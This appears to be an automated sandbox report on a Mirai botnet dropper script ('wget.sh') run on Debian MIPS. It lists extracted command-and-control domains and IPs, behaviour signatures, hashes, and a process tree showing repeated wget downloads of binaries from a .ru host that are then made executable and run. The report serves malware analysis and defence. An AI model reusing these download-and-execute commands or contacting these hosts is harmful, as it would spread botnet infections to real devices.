Analysis
-
max time kernel
133s -
max time network
145s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18-12-2024 13:20
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
wget.sh
-
Size
676B
-
MD5
5b3ceaec7a3ad11b45f5fca1b603d939
-
SHA1
5e5ee3fa232288f77e670c66d8ca42c0cc171e45
-
SHA256
bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
-
SHA512
47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215
Malware Config
Extracted
mirai
BOTNET
boats.dogmuncher.xyz
89.190.156.145
Extracted
mirai
BOTNET
89.190.156.145
boats.dogmuncher.xyz
Extracted
mirai
BOTNET
boats.dogmuncher.xyz
89.190.156.145
Extracted
mirai
89.190.156.1
89.190.156.145
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 734 chmod 755 chmod 783 chmod 828 chmod 833 chmod 743 chmod 751 chmod 761 chmod 797 chmod 815 chmod -
Deletes itself 1 IoCs
pid Process 745 kqibeps -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/wkb86 735 wkb86 /tmp/kqibeps 744 kqibeps /tmp/bojwsl 752 bojwsl /tmp/njvwa4 756 njvwa4 /tmp/ngwa5 762 ngwa5 /tmp/woega6 785 woega6 /tmp/fnkea7 799 fnkea7 /tmp/gnjqwpc 817 gnjqwpc /tmp/wlw68k 830 wlw68k /tmp/wrjkngh4 834 wrjkngh4 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself httpd 744 kqibeps -
description ioc Process File opened for reading /proc/388/cmdline kqibeps File opened for reading /proc/679/cmdline kqibeps File opened for reading /proc/9/cmdline kqibeps File opened for reading /proc/75/cmdline kqibeps File opened for reading /proc/156/cmdline kqibeps File opened for reading /proc/249/cmdline kqibeps File opened for reading /proc/3/cmdline kqibeps File opened for reading /proc/22/cmdline kqibeps File opened for reading /proc/425/cmdline kqibeps File opened for reading /proc/13/cmdline kqibeps File opened for reading /proc/70/cmdline kqibeps File opened for reading /proc/160/cmdline kqibeps File opened for reading /proc/360/cmdline kqibeps File opened for reading /proc/19/cmdline kqibeps File opened for reading /proc/68/cmdline kqibeps File opened for reading /proc/383/cmdline kqibeps File opened for reading /proc/682/cmdline kqibeps File opened for reading /proc/332/cmdline kqibeps File opened for reading /proc/362/cmdline kqibeps File opened for reading /proc/36/cmdline kqibeps File opened for reading /proc/69/cmdline kqibeps File opened for reading /proc/71/cmdline kqibeps File opened for reading /proc/110/cmdline kqibeps File opened for reading /proc/81/cmdline kqibeps File opened for reading /proc/83/cmdline kqibeps File opened for reading /proc/4/cmdline kqibeps File opened for reading /proc/7/cmdline kqibeps File opened for reading /proc/18/cmdline kqibeps File opened for reading /proc/23/cmdline kqibeps File opened for reading /proc/24/cmdline kqibeps File opened for reading /proc/72/cmdline kqibeps File opened for reading /proc/6/cmdline kqibeps File opened for reading /proc/73/cmdline kqibeps File opened for reading /proc/177/cmdline kqibeps File opened for reading /proc/361/cmdline kqibeps File opened for reading /proc/5/cmdline kqibeps File opened for reading /proc/14/cmdline kqibeps File opened for reading /proc/74/cmdline kqibeps File opened for reading /proc/676/cmdline kqibeps File opened for reading /proc/10/cmdline kqibeps File opened for reading /proc/11/cmdline kqibeps File opened for reading /proc/21/cmdline kqibeps File opened for reading /proc/78/cmdline kqibeps File opened for reading /proc/2/cmdline kqibeps File opened for reading /proc/37/cmdline kqibeps File opened for reading /proc/358/cmdline kqibeps File opened for reading /proc/380/cmdline kqibeps File opened for reading /proc/8/cmdline kqibeps File opened for reading /proc/15/cmdline kqibeps File opened for reading /proc/126/cmdline kqibeps File opened for reading /proc/127/cmdline kqibeps File opened for reading /proc/234/cmdline kqibeps File opened for reading /proc/12/cmdline kqibeps File opened for reading /proc/16/cmdline kqibeps File opened for reading /proc/17/cmdline kqibeps File opened for reading /proc/20/cmdline kqibeps -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wlw68k wget File opened for modification /tmp/wrjkngh4 wget File opened for modification /tmp/wkb86 wget File opened for modification /tmp/kqibeps wget File opened for modification /tmp/njvwa4 wget File opened for modification /tmp/fnkea7 wget File opened for modification /tmp/bojwsl wget File opened for modification /tmp/ngwa5 wget File opened for modification /tmp/woega6 wget File opened for modification /tmp/gnjqwpc wget
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵PID:711
-
/usr/bin/wgetwget http://stop.eye-network.ru/wkb862⤵
- Writes file to tmp directory
PID:715
-
-
/bin/chmodchmod +x systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb862⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/wkb86./wkb86 telnet2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/kqibeps2⤵
- Writes file to tmp directory
PID:738
-
-
/bin/chmodchmod +x kqibeps systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb862⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/kqibeps./kqibeps telnet2⤵
- Deletes itself
- Executes dropped EXE
- Changes its process name
- Reads runtime system information
PID:744
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/bojwsl2⤵
- Writes file to tmp directory
PID:747
-
-
/bin/chmodchmod +x bojwsl systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb862⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/bojwsl./bojwsl telnet2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/njvwa42⤵
- Writes file to tmp directory
PID:754
-
-
/bin/chmodchmod +x bojwsl njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb862⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/njvwa4./njvwa4 telnet2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/ngwa52⤵
- Writes file to tmp directory
PID:758
-
-
/bin/chmodchmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb862⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/ngwa5./ngwa5 telnet2⤵
- Executes dropped EXE
PID:762
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/woega62⤵
- Writes file to tmp directory
PID:765
-
-
/bin/chmodchmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega62⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/woega6./woega6 telnet2⤵
- Executes dropped EXE
PID:785
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/fnkea72⤵
- Writes file to tmp directory
PID:787
-
-
/bin/chmodchmod +x bojwsl fnkea7 ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega62⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/fnkea7./fnkea7 telnet2⤵
- Executes dropped EXE
PID:799
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/gnjqwpc2⤵
- Writes file to tmp directory
PID:801
-
-
/bin/chmodchmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega62⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/gnjqwpc./gnjqwpc telnet2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/wlw68k2⤵
- Writes file to tmp directory
PID:821
-
-
/bin/chmodchmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega62⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/wlw68k./wlw68k telnet2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/wrjkngh42⤵
- Writes file to tmp directory
PID:832
-
-
/bin/chmodchmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6 wrjkngh42⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/wrjkngh4./wrjkngh4 telnet2⤵
- Executes dropped EXE
PID:834
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
209KB
MD5901565495bd736c186e19bcf63f9d6d0
SHA10156d815e43459f529a8e1cb131f33b35c2bc389
SHA25619e20910c5b4daf752d3f07df71bf95312b857ad5f4ee00c1f6a383c3413e099
SHA512e148d65c398fb792449734ef9da6813dfa4062f24f4e1ff504094012684fa094012021ab613946e169062c107d6605d191a161925f1583fc8673ed61b6fef77c
-
Filesize
211KB
MD5cc46ad336ea582beb1e6bf06871efccb
SHA1bf95a69fa2704c2cadd2de7fedd6b573489f8a3e
SHA256db7fedf7dc012292b4490f3c526c2f3f8dbbc5542da74551f8f0ec15bab3a01d
SHA5121206b0e0c79ad1d0e7a77b9a16b1afded0e19198fd3df094524b0688fa7a168511fc055d58d4f7957fc1c035ef2d1fa4251ce74146b04b1fb4fcdcaeba2c5cb1
-
Filesize
158KB
MD565679cbca61800b0d5e8824408b318c4
SHA14c5fca0a6ac37a24463c9b5fa1319c8f80e3f1f5
SHA256e6e10d2701e51f85f413e188b8139554704536e6e40f462b6cca0693e9cf0eff
SHA5120acd6c8c7a7ecbe6a0e122c3f988d1d4938c765027234e5d8370676b078c871644b8ddb3db6e12016da4806ff93b748c6b7dd1a0e15366ba14b978edf90ad94c
-
Filesize
206KB
MD5c2728c3969fbcb7e59700b7f6bb997db
SHA1af85cd16b5a1f2623a738b4fb0b422512c504ff4
SHA256e78b085f11226c1acaba5efe9d2d5b60dab6d4043cb49d1a27dd332166a5e70d
SHA5122c68775f9d5da1e1e678fecab7c28558e2c1aaaa2436ca2d6d176fc50c832be232027b7fa8fa490a822cbe630bb724263ac1f764ff0b57345926f9954dacf5f3
-
Filesize
154KB
MD5f54eef0f2a2b3d1b95d027e2f9fc075b
SHA19808f95f07348a1e62b9986ed35ff332f60010b6
SHA2566f062123d1fa8fb843406f71d2bf782017dad159aea3e23fc98543923c0c2bad
SHA512d382986c74a44bd247f3c51d45a1fee5d13746500662e5dbca6d30cd113f89deb1c391b4855e233b645c1690a8d10b09acde0e4b63580b1c8c695be8bdaffa8e
-
Filesize
158KB
MD53d9f94b86edde676d3241c1707c965cb
SHA1b7121399cf77d48c48b2a256b8df1f3579603239
SHA25605ce105f8c50cc8ad232fb7e55d253713a438b08c38735bfea18f04fda288924
SHA512021558a83495e651baca0e7874f78886b3dc3e3d20e505f7ec826effad8b21ebdb29a5343bbdb01170eefa32277fbeda801b29f8bf30d6812b4abeea652bc61b
-
Filesize
113KB
MD55f33f958945dce126f4f18ee23b09162
SHA111bb26bd016673b201bf56c61087e6727736a971
SHA256ae156529ee59ea9218d3bbb7760d536e8becff7ff55659f9b723fcdfb1fa7726
SHA512e96b2b90261b4d7eeb16f9698c83a920a43853cd5d7cff7aae8d2a03fd5e88f7a344437740e6efe22cf789cd9ca29e05328673f49527643a2c13dc0ceb250ef3
-
Filesize
175KB
MD5fc93b0974c9c1fd3179c2bc5714bb203
SHA1aea0232bb853b329ce85fc04552bcfb67cb897fa
SHA2566f83e2edcb9d60d48a3a005edc0b34daea54de05e13cd72d841a7f36a34780c8
SHA512998f8f5521fe9e7b3394f51bc589304c02447952ed28a6f75dfb8ab328957f7466fd84cc4c482b764d1e80dc454e1bb4eaf0cd5588d323d99c97f034cc7832fd
-
Filesize
166KB
MD5b62613f0cd94e7252a6ec8f452b2ee14
SHA1a72e04a7230ee9d505b29386640e8d442d5ee209
SHA25667c705c47fdbb971ad5500dc566409584187c846dc3336c70cd000b07b77a3cf
SHA512760f5f3560215153695f3ca39c836b0b7f18c552f6eb93bf9063b22ead6fefa39f1d1995af5ae0bd5f8bd0d5bbb82d1b639d1512ff64c57ae96dd81d51ae39ba
-
Filesize
142KB
MD56c93d778ab9bbcf70e0cd1f6966be42f
SHA185f235c84a56d4bac89f0b94db1786b374ef0d40
SHA2564e92d2333051f2abd221547d29643d6d7c23b5a30fd84177ebd2b39544338e6f
SHA512b79bc19f4f4a2c5a3f4f286ef73edb198aef8110b52f39146dc850f25a41cf06d33a743a9035945c92dd0a78d91e742c21962c10191f14869a6ee22840ae5549